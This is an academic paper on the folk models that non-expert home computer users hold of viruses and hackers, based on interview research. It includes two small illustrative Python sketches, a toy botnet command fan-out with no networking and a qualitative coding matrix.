by Rick Wash / at SOUPS (Symposium on Usable Privacy and Security)

Home computer systems are insecure because they are administered by untrained users. The rise of botnets has amplified this problem; attackers compromise these computers, aggregate them, and use the resulting network to attack third parties. Despite a large security industry that provides software and advice, home computer users remain vulnerable. I identify eight ‘folk models’ of security threats that are used by home computer users to decide what security software to use, and which expert security advice to follow: four conceptualizations of ‘viruses’ and other malware, and four conceptualizations of ‘hackers’ that break into computers. I illustrate how these models are used to justify ignoring expert security advice. Finally, I describe one reason why botnets are so difficult to eliminate: they cleverly take advantage of gaps in these models so that many home computer users do not take steps to protect against them.

Home users are installing paid and free home security software at a rapidly increasing rate.{1} These systems include anti-virus software, anti-spyware software, personal firewall software, personal intrusion detection / prevention systems, computer login / password / fingerprint systems, and intrusion recovery software. Nonetheless, security intrusions and the costs they impose on other network users are also increasing. One possibility is that home users are starting to become well-informed about security risks, and that soon enough of them will protect their systems that the problem will resolve itself. However, given the “arms race” history in most other areas of networked security (with intruders becoming increasingly sophisticated and numerous over time), it is likely that the lack of user sophistication and non-compliance with recommended security system usage policies will continue to limit home computer security effectiveness. To design better security technologies, it helps to understand how users make security decisions, and to characterize the security problems that result from these decisions. To this end, I have conducted a qualitative study to understand users’ mental models [18, 11] of attackers and security technologies. Mental models describe how a user thinks about a problem; it is the model in the person’s mind of how things work. People use these models to make decisions about the effects of various actions [17]. In particular, I investigate the existence of folk models for home computer users. Folk models are mental models that are not necessarily accurate in the real world, thus leading to erroneous decision making, but are shared among similar members of a culture [11]. It is well-known that in technological contexts users often operate with incorrect folk models [1]. To understand the rationale for home users’ behavior, it is important to understand the decision model that people use.
If technology is designed on the assumption that users have correct mental models of security threats and security systems, it will not induce the desired behavior when they are in fact making choices according to a different model. As an example, Kempton [19] studied folk models of thermostat technology in an attempt to understand the wasted energy that stems from poor choices in home heating. He found that his respondents possessed one of two mental models for how a thermostat works. Both models can lead to poor decisions, and both models can lead to correct decisions that the other model gets wrong. Kempton concludes that “Technical experts will evaluate folk theory from this perspective [correctness] – not by asking whether it fulfills the needs of the folk. But it is the latter criterion […] on which sound public policy must be based.” The same argument holds for technology design: whether the folk models are correct or not, technology should be designed to work well with the folk models actually employed by users.{2} For home computer security, I study two related research questions: 1) Potential threats: How do home computer users conceptualize the information security threats that they face? 2) Security responses: How do home computer users apply their mental models of security threats to make security-relevant decisions? Despite my focus on “home computer users,” many of these problems extend beyond the home; most of my analysis and understanding in this paper is likely to generalize to a whole class of users who are unsophisticated in their security decisions. This includes many university computers, computers in small businesses that lack IT support, and personal computers used for business purposes.

{1} Despite a worldwide recession, the computer security industry grew 18.6% in 2008, totaling over $13 billion, according to a recent Gartner report [9].
{2} It may be that users can be re-educated to use more correct mental models, but it is generally more difficult to re-educate users than to design technology that works with their existing models.

1.1 Understanding Security
Managing the security of a computer system is very difficult. Ross Anderson’s [2] study of Automated Teller Machine (ATM) fraud found that the majority of the fraud committed using these machines was not due to technical flaws, but to errors in deployment and management failures. These problems illustrate the difficulty that even professionals face in producing effective security. The vast majority of home computers are administered by people who have little security knowledge or training. Existing research has investigated how non-expert users deal with security and network administration in a home environment. Dourish et al. [12] conducted a related study, inquiring not into mental models but how corporate knowledge workers handled security issues. Gross and Rosson [15] also studied what security knowledge end users possess in the context of large organizations. And Grinter et al. [14] interviewed home network users about their network administration practices. Combining the results from these papers, it appears that many users exert much effort to avoid security decisions. All three papers report that users often find ways to delegate the responsibility for security to some external entity; this entity could be technological (like a firewall), social (another person or IT staff), or institutional (like a bank). Users do this because they feel like they don’t have the skills to maintain proper security. However, despite this delegation of responsibility, many users still make numerous security-related decisions on a regular basis. These papers do not explain how those decisions get made; rather, they focus mostly on the anxiety these decisions create. I add structure to these observations by describing how folk models enable home computer users to make security decisions they cannot delegate. I also focus on differences between people, and characterize different methods of dealing with security issues rather than trying to find general patterns.
The folk models I describe may explain differences observed between users in these studies. Camp [6] proposed using mental models as a framework for communicating complex security risks to the general populace. She did not study how people currently think about security, but proposed five possible models that may be useful. These models take the form of analogies or metaphors with other similar situations: physical security, medical risks, crime, warfare, and markets. Asgharpour et al. [3] built on this by conducting a card sorting experiment that matches these analogies with the mental models of users. They found that experts and non-experts show sharp differences in which analogy their mental model is closest to. Camp et al. began by assuming a small set of analogies that they believe function as mental models. Rather than pre-defining the range of possible models, I treat these mental models as a legitimate area for inductive investigation, and endeavor to uncover users’ mental models in whatever form they take. This prior work confirms that the concept of mental models may be useful for home computer security, but made assumptions which may or may not be appropriate. I fill in the gap by inductively developing an understanding of just what mental models people actually possess. Also, given the vulnerability of home computers and the finding that experts and non-experts differ sharply [3], I focus solely on non-expert home computer users. Herley [16] argues that non-expert users reject security advice because it is rational to do so. He believes that security experts provide advice that ignores the costs of the users’ time and effort, and therefore overestimates the net value of security. I agree, though I dig deeper into understanding how users actually make these security / effort tradeoffs.

1.2 Botnets and Home Computer Security
In the past, computers were targeted by hackers approximately in proportion to the amount of value stored on them or accessible from them. Computers that stored valuable information, such as bank computers, were a common target, while home computers were largely ignored. Recently, attackers have used a technique known as a ‘botnet,’ where they hack into a number of computers and install special ‘control’ software on those computers. The hacker can give a master control computer a single command, and it will be carried out by all of the compromised computers (called zombies) it is connected to [4, 5]. This technology enables crimes that require large numbers of computers, such as spam, click fraud, and distributed denial of service [26]. Observed botnets range in size from a couple hundred zombies to 50,000 or more zombies. As John Markoff of the New York Times observes, botnets are not technologically novel; rather, “what is new is the vastly escalating scale of the problem” [21]. Since any computer with an Internet connection can serve as an effective zombie, hackers have logically turned to attacking the most vulnerable population: home computers. Home computer users are usually untrained and have few technical skills. While some software has improved the average level of security of this class of computers, home computers still represent the largest population of vulnerable computers. When compromised, these computers are often used to commit crimes against third parties. The vulnerability of home computers is a security problem for many companies and individuals who are the victims of these crimes, even if their own computers are secure [7].
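The command fan-out described above — one instruction from a master controller carried out by every zombie — can be sketched as a harmless toy. All class and method names below are hypothetical illustrations; there is no networking and no real malware behavior involved:

```python
# Toy illustration (not real malware) of botnet command fan-out:
# a single command from the controller is executed by every
# compromised machine ("zombie") it controls.

class ToyController:
    def __init__(self):
        self.zombies = []              # machines under control

    def register(self, zombie):
        self.zombies.append(zombie)

    def broadcast(self, command):
        # One command fans out to every zombie; this is the
        # scale asymmetry that makes botnets attractive.
        return [z.execute(command) for z in self.zombies]

class ToyZombie:
    def __init__(self, name):
        self.name = name
        self.log = []                  # commands this zombie received

    def execute(self, command):
        self.log.append(command)       # e.g. "send spam", "flood target"
        return (self.name, command)

controller = ToyController()
for i in range(3):
    controller.register(ToyZombie(f"home-pc-{i}"))

results = controller.broadcast("send spam")
print(results)
```

The point of the sketch is the asymmetry: the controller does constant work per command, while the effect scales linearly with the number of compromised home machines.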

1.3 Methods
I conducted a qualitative inquiry into how home computer users understand and think about potential threats. To develop depth in my exploration of the folk models of security, I used an iterative methodology as is common in qualitative research [24]. I conducted multiple rounds of interviews punctuated with periods of analysis and tentative conclusions. The first round of 23 semi-structured interviews was conducted in Summer 2007. Preliminary analysis proceeded throughout the academic year, and a second round of 10 interviews was conducted in Summer 2008, for a total of 33 respondents. This second round was more focused, and specifically searched for negative cases of earlier results [24]. Interviews averaged 45 minutes each; they were audio recorded and transcribed for analysis. Respondents were chosen from a snowball sample [20] of home computer users evenly divided between three mid-western U.S. cities. I began with a few home computer users that I knew in these cities. I asked them to refer me to others in the area who might be information-rich informants. I screened these potential respondents to exclude people who had expertise or training in computers or computer security. From those not excluded, I purposefully selected respondents for maximum variation [20]: I chose respondents from a wide variety of backgrounds, ages, and socio-economic classes. Ages ranged from undergraduate (19 years old) up through retired (over 70). Socio-economic status was not explicitly measured, but ranged from a recently graduated artist living in a small efficiency up to a successful executive who owns a large house overlooking the main river through town. Selecting for maximum variation allows me to document diverse variations in folk models and identify important common patterns [20]. After interviewing the chosen respondents, I grew my potential interview pool by asking them to refer me to more people with home computers who might provide useful information.
This snowballing through recommendations ensured that the contacted respondents would be information-rich [20] and cooperative. These new potential respondents were also screened, selected, and interviewed. The method does not generate a sample that is representative of the population of home computer users. However, I don’t believe that the sample is a particularly special or unusual group; it is likely that there are other people like them in the larger population.

I developed an (IRB approved) face-to-face semi-structured interview protocol that pushes subjects to describe and use their mental models, based on formal methods presented by D’Andrade [11]. I specifically probed for past instances where the respondents would have had to use their mental model to make decisions, such as past instances of security problems, or efforts undertaken to protect their computers. By asking about instances where the model was applied to make decisions, I enabled the respondents to uncover beliefs that they might not have been consciously aware of. This also ensures that the respondents believe their model enough to base choices on it. The majority of each interview was spent on follow-up questions, probing deeper into the responses of the subject. This method allows me to describe specific, detailed mental models that my participants use to make security decisions, and to be confident that these are models that the participants actually believe. My focus in the first round was broad and exploratory. I asked about any security-related problems the respondent had faced or was worried about; I also specifically asked about viruses, hackers, data loss, and data exposure (identity theft). I probed to discover what countermeasures the respondents used to mitigate these risks. Since this was a semi-structured interview, I followed up on many responses by probing for more information. After preliminary analysis of this data, I drew some tentative conclusions and listed points that needed clarification. To better elucidate these models and to look for negative cases, I conducted 10 second-round interviews using a new (IRB approved) interview protocol. In this round, I focused more on three specific threats that subjects face: viruses, hackers, and identity theft. For this second round, I also used an additional interviewing technique: hypothetical scenarios.
This technique was developed to help focus the respondents and elicit additional information not present in the first round of interviews. I presented the respondents with three hypothetical scenarios and asked the subjects for their reaction. The three scenarios correspond to each of the three main themes for the second round: finding out you have a virus, finding out a hacker has compromised your computer, and being informed that you are a victim of identity theft. For each scenario, after the initial description and respondent reaction, I added an additional piece of information that contradicted the mental models I discovered after the first round. For example, one preliminary finding from the first round was that people rarely talked about the creation of computer viruses; it was unclear how they would react to a computer virus that was created by people for a purpose. In the virus scenario, I informed the respondents that the virus in question was written by the Russian mafia. This fact was taken from recent news linking the Russian mafia to widespread viruses such as Netsky, Bagle, and Storm.{3} Once I had all of the data collected and transcribed, I conducted both inductive and deductive coding of the data to look both for predetermined and emergent themes [23]. I began with a short list of major themes I expected to see from my pilot interviews, such as information about viruses, hackers, identity theft, countermeasures, and sources of information. I identified and labeled (coded) instances when the respondents discussed these themes. I then expanded the list of codes as I noticed interesting themes and patterns emerging. Once all of the data was coded, I summarized the data on each topic by building a data matrix [23].{4} This data matrix helped me to identify basic patterns in the data across subjects, to check for representativeness, and to look for negative cases [24].

After building the initial summary matrices, I identified patterns in the way respondents talked about each topic, paying specific attention to word choices, metaphors employed, and explicit content of statements. Specifically, I looked for themes in which users differ in their opinions (negative case analysis). These themes became the building blocks for the mental models. I built a second matrix that matched subjects with these features of mental models.{5} This second matrix allowed me to identify and characterize the various mental models that I encountered. Table 7 in the Appendix shows which participants from Round 2 had each of the 8 models. A similar table was developed for the Round 1 participants. I then took the description of each model back to the data, verified whether the model description accurately represented the respondents’ descriptions, and looked for contradictory evidence and negative cases [24]. This allowed me to update the models with new information or insights garnered by following up on surprises and incorporating outliers. This was an iterative process; I continued updating model descriptions, looking for negative cases, and checking for representativeness until I felt that the model descriptions accurately represented the data. In this process, I developed further matrices as data visualizations, some of which appear in my descriptions below.
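As a concrete illustration of the matrix-building step, the following is a minimal sketch of how coded interview fragments can be pivoted into a respondent-by-theme matrix. The excerpt data and code names are invented for illustration; they are not the actual analysis artifacts:

```python
# Sketch of the qualitative data-matrix step: rows are respondents,
# columns are coded themes, and each cell summarizes how (or whether)
# that theme appeared in that respondent's interview.
# The coded excerpts below are hypothetical examples.

coded_excerpts = [
    ("Zoe",   "virus-transmission", "strange emails, random searching"),
    ("Zoe",   "precautions",        "none; feels safe due to light use"),
    ("Peggy", "virus-transmission", "blinky ads"),
    ("Erica", "virus-effects",      "crashes, gets booted out of apps"),
]

respondents = sorted({r for r, _, _ in coded_excerpts})
themes = sorted({t for _, t, _ in coded_excerpts})

# Build the matrix with an empty cell for every respondent/theme pair,
# then fill in the coded summaries.
matrix = {r: {t: "" for t in themes} for r in respondents}
for respondent, theme, summary in coded_excerpts:
    matrix[respondent][theme] = summary

# Scanning down a column shows the range of responses on one theme,
# which supports the representativeness and negative-case checks.
for r in respondents:
    print(r, matrix[r])
```

Empty cells are as informative as filled ones here: a blank column entry flags a respondent who never raised that theme, which is exactly the kind of gap the negative-case analysis looks for.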

{4} A fragment of this matrix can be seen in Table 5 in the Appendix.
{5} A fragment of this matrix is Table 6 in the Appendix.

I identified a number of different folk models in the data. Every folk model was shared by multiple respondents in this study. The purpose of qualitative research is not to generalize to a population; rather, it is to explore phenomena in depth. To avoid misleading readers, I do not report how many users possessed each folk model. Instead, I describe the full range of folk models I observed. I divide the folk models into two broad categories based on a distinction that most subjects possessed: 1) models about viruses, spyware, adware, and other forms of malware, which everyone referred to under the umbrella term ‘virus’; and 2) models about the attackers, referred to as ‘hackers,’ and the threat of ‘breaking into’ a computer. Each respondent had at least one model from each of the two categories. For example, Nicole {6} believed that viruses were mischievous, and that hackers are criminals who target big fish. These models are not necessarily mutually exclusive. For example, a few respondents talked about different types of hackers and would describe more than one folk model of hackers. Note that by listing and describing these folk models, in no way do I intend to imply that these models are incorrect or bad in any way. They are all certainly incomplete, and do not exactly correspond to the way malicious software or malicious computer users behave. But, as Kempton [19] learned in his study of home thermostats, what is important is not how accurate the model is but how well it serves the needs of the home computer user in making security decisions. Additionally, there is no “correct” model that can serve as a comparison. Even security experts will disagree as to the correct way to think about viruses or hackers. To show an extreme example, Medin et al. [22] conducted a study of expert fishermen in the Northwoods of Wisconsin. They looked at the mental models of both Native American fishermen and of majority-culture fishermen.
Despite both groups being experts, the two groups showed dramatic differences in the way fish were categorized and classified. Majority-culture fishermen grouped fish into standard taxonomic and goal-oriented groupings, while Native American fishermen grouped fish mostly by ecological niche. This illustrates how even experts can have dramatically different mental models of the same phenomenon, and any single expert’s model is not necessarily correct. However, experts and novices do tend to have very different models; Asgharpour et al. [3] found strong differences between expert and novice computer users in their mental models of security.

Common Elements of Folk Models
Most respondents made a distinction between ‘viruses’ and ‘hackers.’ To them, these are two separate threats that can both cause problems. Some people believed that viruses are created by hackers, but they still usually saw them as distinct threats. A few respondents realized this and tried to describe the difference; for example, at one point in the interview Irving tries to explain the distinction by saying “The hacker is an individual hacking, while the virus is a program infecting.” After some thought, he clarifies his idea of the difference a bit: “So it’s a difference between something automatic and more personal.” This description is characteristic of how many respondents think about the difference: viruses are usually more programmatic and automatic, whereas hacking is more like manual labor, requiring the hacker to be sitting in front of a computer entering commands. This distinction between hackers and viruses is not something that most of the respondents had thought about; it existed in their mental model but not at a conscious level. Upon prompting, Dana decides that “I guess if they hack into your system and get a virus on there, it’s gonna be the same thing.” She had never realized that they were distinct in her mind, but it makes sense to her that they might be related. She then goes on to ask the interviewer whether, if she gets hacked, she can forward it on to other people. This also illustrates another common feature of these interviews. When exposed to new information, most of the respondents would extrapolate and try to apply that information to slightly different settings. When Dana was prompted to think about the relationship between viruses and hackers, she decided that they were more similar than she had previously realized. Then she began to apply ideas from one model (viruses spreading) to the other model (can hackers spread also?) by extrapolating from her current models. This is a common technique in human learning and sensemaking [25].
I suspect that many details of the mental models were formed in this way. Extrapolation is also useful for analysis; how respondents extrapolate from new information reveals details about mental models that are not consciously salient during interviews [8, 11]. During the interviews I used a number of prompts that were intended to challenge mental models and force users to extrapolate in order to help surface more elements of their mental models.

2.1 Models of Viruses and other Malware
All of the respondents had heard of computer viruses and possessed some mental model of their effects and transmission. The respondents focused their discussion primarily on the effects of viruses and the possible methods of transmission. In the second round of interviews, I prompted respondents to discuss how and why viruses are created by asking them to react to a number of hypothetical scenarios. These scenarios help me understand how the respondents apply these models to make security-relevant decisions. All of the respondents used the term ‘virus’ as a catch-all term for malicious software. Everyone seemed to recognize that viruses are computer programs. Almost all of the respondents classify many different types of malicious software under this term: computer viruses, worms, trojans, adware, spyware, and keyloggers were all mentioned as ‘viruses.’ The respondents don’t make the distinctions that most experts do; they just call any malicious computer program a ‘virus.’ In keeping with the term ‘virus,’ all of the respondents used some sort of medical terminology to describe the actions of malware. Getting malware on your computer means you have ‘caught’ the virus, and your computer is ‘infected.’ Everyone who had a Mac seemed to believe that Macs are ‘immune’ to virus and hacking problems (but were worried anyway).

Overall, I found four distinct folk models of ‘viruses.’ These models differed in a number of ways. One of the major differences is how well-specified and detailed the model was, and therefore how useful the model was for making security-related decisions. One model was very under-specified, labeling viruses as simply ‘bad.’ Respondents with this model had trouble using it to make any kind of security-related decision because the model didn’t contain enough information to provide guidance. Two other models (the Mischief and Crime models) were fairly well-described, including how viruses are created and why, and what the major effects of viruses are. Respondents with these models could extrapolate them to many different situations and use them to make many security-related decisions on their computer. Table 1 summarizes the major differences between the four models.

{6} All respondents have been given pseudonyms for anonymity.

2.1.1 Viruses are Generically ‘Bad’
A few subjects had a very under-developed model of viruses. These subjects knew that viruses cause problems, but couldn’t really describe what those problems are. They just knew that viruses were generically ‘bad’ to get and should be avoided. Respondents with this model knew of a number of different ways that viruses are transmitted. These transmission methods seemed to be things that the subjects had heard about somewhere, but the respondents did not attempt to understand them or organize them into a more coherent mental model. Zoe believed that viruses can come from strange emails, or from “searching random things” on the Internet. She says she had heard that blocking popups helps with viruses too, and seemed to believe that without questioning. Peggy had heard that viruses can come from “blinky ads like you’ve won a million bucks.” Respondents with this model are uniformly unconcerned with getting viruses: “I guess just my lack of really doing much on the Internet makes me feel like I’m safer.” (Zoe). A couple of people with this model use Macintosh computers, which they believe to be “immune” to computer viruses. Since they are immune, it seems that they have not bothered to form a more complete model of viruses. Since these users are not concerned with viruses, they do not take any precautions against being infected. These users believe that their current behavior doesn’t really make them vulnerable, so they don’t need to go to any extra effort. Only one respondent with this model uses an anti-virus program, but that is because it came installed on the computer. These respondents seem to recognize that anti-virus software might help, but are not concerned enough to purchase or install it.

2.1.2 Viruses are Buggy Software
One group of respondents saw computer viruses as an exceptionally bug-ridden form of regular computer software. In many ways, these respondents believe that viruses behave much like most of the other software that home users experience. But to be a virus, it has to be ‘bad’ in some additional way. Primarily, viruses are ‘bad’ in that they are poorly written software. They lead to a multitude of bugs and other errors in the computer. They bring out bugs in other pieces of software. They tend to have more bugs, and worse bugs, than most other pieces of software. But all of the effects they cause are the same types of effects you get from buggy software: viruses can cause computers to crash, or to “boot me out” (Erica) of applications that are running; viruses can accidentally delete or “wipe out” information (Christine and Erica); they can erase important system files. In general, the computer just “doesn’t function properly” (Erica) when it has a virus. Just like normal software, viruses must be intentionally placed on the computer and executed. Viruses do not just appear on a computer. Rather than ‘catching’ a virus, computers are actively infected, though often this infection is accidental. Some viruses come in the form of email attachments. But they are not a threat unless you actually “click” on the attachment to run it. If you are careful about what you click on, then you won’t get the virus. Another example is that viruses can be downloaded from websites, much like many other applications. Erica believes that sometimes downloading games can end up causing you to download a virus. But still, intentional downloading and execution is necessary to be infected with a virus, much the same way that intentional downloading and execution is necessary to run programs from the Internet. Respondents with this model did not feel that they needed to exert a lot of effort to protect themselves from viruses. 
Mostly, these users tried not to download and execute programs that they didn’t trust. Sarah intentionally “limits herself” by not downloading any programs from the Internet so she doesn’t get a virus. Since viruses must be actively executed, anti-virus programs are not important. As long as no one downloads and runs programs from the Internet, no virus can get onto the computer. Therefore, anti-virus programs that detect and fix viruses aren’t needed. However, two respondents with this model run anti-virus software just in case a virus is accidentally put on the computer. Overall, this is a somewhat underdeveloped mental model of viruses. Respondents who possessed this model had never really thought about how viruses are created, or why. When asked, they talk about how they haven’t thought about it, and then make guesses about how ‘bad people’ might be the ones who create them. These respondents haven’t put much thought into their mental model of viruses; all of the effects they discuss are either effects they have seen or more extreme versions of bugs they have seen in other software. Christine says “I guess I would know [if I had a virus], wouldn’t I?” presuming that any effects the virus has would be evident in the behavior of the computer. No connection is made between hackers and viruses; they are distinct and separate entities in the respondents’ minds.

2.1.3 Viruses Cause Mischief
A good number of respondents believed that viruses are pieces of software that are intentionally annoying. Someone created the virus for the purpose of annoying computer users and causing mischief. Viruses often have effects that are much like extreme versions of annoying bugs: crashing your computer, deleting important files so your computer won’t boot, etc. Often the effects of viruses are intentionally annoying, such as displaying a skull and crossbones upon boot (Bob), displaying advertising popups (Floyd), or downloading lots of pornography (Dana). While these respondents believe that viruses are created to be annoying, they rarely have a well-developed idea of who created them. They don’t naturally mention a creator for the viruses, just a reason why they are created. When pushed, these respondents will talk about how they are probably created by “hackers” who fit the Graffiti hacker model below. But the identity of the creator doesn’t play much of a role in making security decisions with this model. Respondents with this model always believe that viruses can be “caught” by actively clicking on them and executing them. However, most respondents with this model also believe that viruses can be “caught” by simply visiting the wrong webpages. Infection here is very passive and can come just from visiting the webpage. These webpages are often considered to be part of the ‘bad’ part of the Internet. Much like graffiti appears in the ‘bad’ parts of cities, mischievous viruses are most prevalent on the bad parts of the Internet. While almost everyone believes that care in clicking on attachments or downloads is important, these respondents also try to be careful about where they go on the Internet. One respondent (Floyd) tries to explain why: cookies are automatically put on your computer by websites, and therefore viruses being automatically put on your computer could be related to this.
These ‘bad’ parts of the Internet where you can easily contract viruses are frequently described as morally ambiguous webpages. Pornography is always considered shady, but some respondents also included entertainment websites where you can play games, and websites that have been on the news like “MySpaceBook” (Gina). Some respondents believed that a “secured” website would not lead to a virus, but Gail acknowledged that at some sites “maybe the protection wasn’t working at those sites and they went bad.” (Note the passive voice; again, she has not thought about how sites go bad or who causes them to go bad. She is just concerned with the outcome.)

2.1.4 Viruses Support Crime
Finally, some respondents believe that viruses are created to support criminal activities. Almost uniformly, these respondents believe that identity theft is the end goal of the criminals who create these viruses, and the viruses assist them by stealing personal and financial information from individual computers. For example, respondents with this model worry that viruses are looking for credit card numbers, bank account information, or other financial information stored on their computer. Since the main purpose of these viruses is to collect information, the respondents who have this model believe that viruses often remain undetected on computers. These viruses do not explicitly cause harm to the computer, and they do not cause bugs, crashes, or other problems. All they do is send information to criminals. Therefore, it is important to run an anti-virus program on a regular basis because it is possible to have a virus on your computer without knowing it. Since viruses don’t harm your computer, backups are not necessary. People with this model believed that there are many different ways for these viruses to spread. Some viruses spread through downloads and attachments. Other viruses can spread “automatically,” without requiring any actions by the user of the computer. Also, some people believe that hackers will install this type of virus onto the computer when they break in. Given this wide variety of transmission methods and the serious nature of identity theft, respondents with this model took many steps to try to stop these viruses. These users would work to keep their anti-virus up to date, purchasing new versions on a regular basis. Often, they would notice when the anti-virus would conduct a scan of their computer and check the results. Valerie would even turn her computer off when it is not in use to avoid potential problems with viruses.

2.1.5 Multiple Types of Viruses
A couple of respondents discussed multiple types of viruses on the Internet. These respondents believed that some viruses are mischievous and cause annoying problems, while other viruses support crime and are difficult to detect. All respondents who talked about more than one type of virus drew on both of the previous two virus folk models: the mischievous viruses and the criminal viruses. One respondent, Jack, also talked about a third type of virus that was created by anti-virus companies, but he seemed to regard this as a conspiracy theory and consequently didn’t take the suggestion very seriously. Respondents with multiple models generally took all of the precautions that either model would predict. For example, they would make regular backups in case they caught a mischievous virus that damaged their computer, but they would also regularly run their anti-virus program to detect the criminal viruses that don’t have noticeable effects. This suggests that information sharing between users may be beneficial; when users believe in multiple types of viruses, they take appropriate steps to protect against all types.

2.2 Models of Hackers and Break-ins
The second major category of folk models describes the attackers: the people who cause Internet security problems. These attackers are always given the name “hackers,” and all of the respondents seemed to have some concept of who these people were and what they did. The term “hacker” was used to describe anyone who does bad things on the Internet, no matter who they are or how they work. All of the respondents described the main threat that hackers pose as “breaking in” to their computer. They disagreed as to why a hacker would want to “break in” to a computer, and which computers hackers would target for their break-ins, but everyone agreed on the terminology for this basic action. To the respondents, breaking in to a computer meant that the hacker could then use the computer as if they were sitting in front of it, and could cause a number of different things to happen to the computer. Many respondents stated that they did not understand how this worked, but they still believed it was possible. My respondents described four distinct folk models of hackers. These models differed mainly in who they believed these hackers were, what they believed motivated these people, and how they chose which computers to break in to. Table 2 summarizes the four folk models of hackers.

2.2.1 Hackers are Digital Graffiti Artists
One group of respondents believe that hackers are technically skilled people causing mischief: a collection of individuals, usually called “hackers,” who use computers to cause a technological version of mischief. Often these individuals are envisioned as “college-age computer types” (Kenneth). These respondents see hacking as a sort of digital graffiti; hackers break in to computers and intentionally cause problems so they can show off to their friends. Victim computers are a canvas for their art. When respondents with this model talked about hackers, they usually focused on two features: strong technical skills and the lack of proper moral restraint. Strong technical skills provide the motivation; hackers do it “for sheer sport” (Lorna) or to demonstrate technical prowess (Hayley). Some respondents envision a competition between hackers, where more sophisticated viruses or hacks “prove you’re a better hacker” (Kenneth); others see creating viruses and hacking as part of “learning about the Internet” (Jack). Lack of moral restraint is what makes them different from others with technical skills; hackers are sometimes described as maladjusted individuals who “want to hurt others for no reason” (Dana), or as “miserable” people. Respondents feel that hackers do what they do for no good reason, or at least no reason they can understand. Hackers are believed to be lone individuals; while they may have hacker friends, they are not part of any organization. Users with this model often focus on the identity of the hacker. This identity – a young computer geek with poor morals – is much more developed in their mind than the resulting behavior of the hacker. As such, people with this model can usually talk clearly and give examples of who hackers are, but seem less confident about the break-ins that result. These hackers like to break stuff on the computer to create havoc.
They will intentionally upload viruses to computers to cause mayhem. Many subjects believe that hackers intentionally cause computers harm; for example, Dana believes that hackers will “fry your hard drive.” Hackers might install software to let them control your computer; Jack talked about how a hacker would use his instant messenger to send strange messages to his friends. These mischievous hackers were seen as not targeting specific individuals, but rather choosing random strangers to attack. This is much like graffiti; the hackers need a canvas and choose whatever computer they happen to come upon. Because of this, the respondents felt that they might become a victim of this type of hacking at any time. Often, these respondents felt there wasn’t much they could do to protect themselves from this type of hacking, because they didn’t understand how hackers were able to break into computers and therefore didn’t know what could be done to stop it. This would lead to a feeling of futility: “if they are going to get in, they’re going to get in.” (Hayley) This feeling of futility echoes similar statements discussed by Dourish et al. [12].

2.2.2 Hackers are Burglars Who Break Into Computers for Criminal Purposes
Another set of respondents believe that hackers are criminals that happen to use computers to commit their crimes. Other than the use of the computer, they share a lot in common with other professional criminals: they are motivated by financial gain, and they can do what they do because they lack common morals. They “break into” computers to look for information much like a burglar breaks into houses to look for valuables. The most salient part of this folk model is the behavior of the hacker; the respondents could talk in detail about what the hackers were looking for but spoke very little about the identity of the hacker. Almost exclusively, this criminal activity is some form of identity theft. For example, respondents believe that if a hacker obtains their credit card number, then that hacker can make fraudulent charges with it. But the respondents weren’t always sure what kind of information the hacker was specifically looking for; they just described it as information the hacker could use to make money. Ivan talked about how hackers would look around the computer much like a thief might rummage around in an attic, looking for something useful. Erica used a different metaphor, saying that hackers would “take a digital photo of everything on my computer” and look in it for useful identity information. Usually, the respondents envision the hacker himself using this financial information (as opposed to selling the information to others). Since hackers target information, the respondents believe that computers are not harmed by the break-ins. Hackers look for information, but do not harm the computer. They simply rummage around, “take a digital photo,” possibly install monitoring software, and leave. The computer continues to work as it did before. The main concern of the respondents is how the hacker might use the information that they steal.
These hackers choose victims opportunistically; much like a mugger chooses his victims, these hackers will break into any computers they run across to look for valuable information. Or, more accurately, the respondents don’t have a good model of how hackers choose, and believe that there is a decent chance that they will be a victim someday. Gail talks about how hackers are opportunistic, saying “next time I go to their site they’ll nab me.” Hayley believes that they just choose computers to attack without knowing much about who owns them. Respondents with this belief are willing to take steps to protect themselves from hackers to avoid becoming a victim. Gail tries to avoid going to websites she’s not familiar with to prevent hackers from discovering her. Jack is careful to always sign out of accounts and websites when he is finished. Hayley shuts off her computer when she isn’t using it so hackers cannot break into it.

2.2.3 Hackers are Criminals who Target Big Fish
Another group of respondents had a conceptually similar model. This group also believes that hackers are Internet criminals who are looking for information to conduct identity theft. However, this group has thought more about how these hackers can best accomplish this goal, and has come to some different conclusions. These respondents believe in “massive hacker groups” (Hayley) and other forms of organization and coordination among criminal hackers. Most tellingly, this group believes that hackers only target the “big fish.” Hackers primarily break into computers of important and rich people in order to maximize their gains. Every respondent who holds this model believes that he or she is not likely to be a victim because he or she is not a big enough fish. They believe that hackers are unlikely to ever target them, and therefore that they are safe from hacking. Irving believes that “I’m small potatoes and no one is going to bother me.” They often talk about how other people are more likely targets: “Maybe if I had a lot of money” (Floyd) or “like if I were a bank executive” (Erica). For these respondents, protecting against hackers isn’t a high priority. Mostly they find reasons to trust existing security precautions rather than taking extra steps to protect themselves. For example, Irving talked about how he trusts his pre-installed firewall program to protect him. Both Irving and Floyd trust their passwords to protect them. Basically, their actions indicate that they believe in a speed bump theory: by making themselves slightly harder to attack using standard security technologies, hackers will decide it isn’t worthwhile to target them.

2.2.4 Hackers are Contractors Who Support Criminals
Finally, there is a sort of hybrid model of hackers. In this view, the hackers themselves are very similar to the mischievous graffiti-hackers from above: they are college-age, technically skilled individuals. However, their motivations are more intentional and criminal: these hackers are out to steal personal and financial information from people. Users with this model show evidence of more effort in thinking through their mental model and integrating the various sources of information they have. This model can be seen as a hybrid of the mischievous graffiti-hacker model and the criminal hacker model, integrated into a coherent form by combining the most salient part of the mischievous model (the identity of the hacker) and the most salient part of the criminal model (the criminal activities). Also, everyone who had this model expressed uncertainty about how hacking works. Kenneth stated that he doesn’t understand how someone can break into a computer without sitting in front of it. Lorna wondered how you can start a program running; she feels you have to be in front of the computer to do that. This indicates that these respondents are actively trying to integrate the information they have about hackers into a coherent model of hacker behavior. Since these hackers are first and foremost young technical people, the respondents believe that these hackers are not likely to be identity thieves themselves. They believe that the hackers are more likely to sell identity information for others to use. Since the hackers just want to sell information, the respondents reason, they are more likely to target large databases of identity information such as banks or online retailers. Consequently, respondents with this model believed that hackers weren’t really their problem. Since these hackers tended to target larger institutions like banks or e-commerce websites, their own personal computers weren’t in danger, and therefore no effort was needed to secure their personal computers.
However, all respondents with this model expressed a strong concern for who they do business with online. These respondents would only make purchases or provide personal information to institutions they trusted to get the security right and figure out how to be protected against hackers. These users were highly sensitive to third parties possessing their data.

2.2.5 Multiple Types of Hackers
